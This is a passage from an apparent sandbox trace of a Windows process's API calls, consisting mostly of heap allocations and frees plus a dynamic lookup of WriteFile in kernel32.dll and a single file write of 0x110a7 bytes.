dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.306] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.307] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.308] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.308] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690770 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.308] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690850 [0076.308] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690660 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.309] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906c0 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e600 [0076.309] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.310] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0076.310] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0076.310] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.310] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.311] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.311] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.311] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.312] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.313] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76ace8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.313] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.313] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.314] WriteFile (in: hFile=0x128, lpBuffer=0x771fe8*, nNumberOfBytesToWrite=0x110a7, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesWritten=0x61e598*=0x110a7, lpOverlapped=0x0) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.314] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0076.315] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: 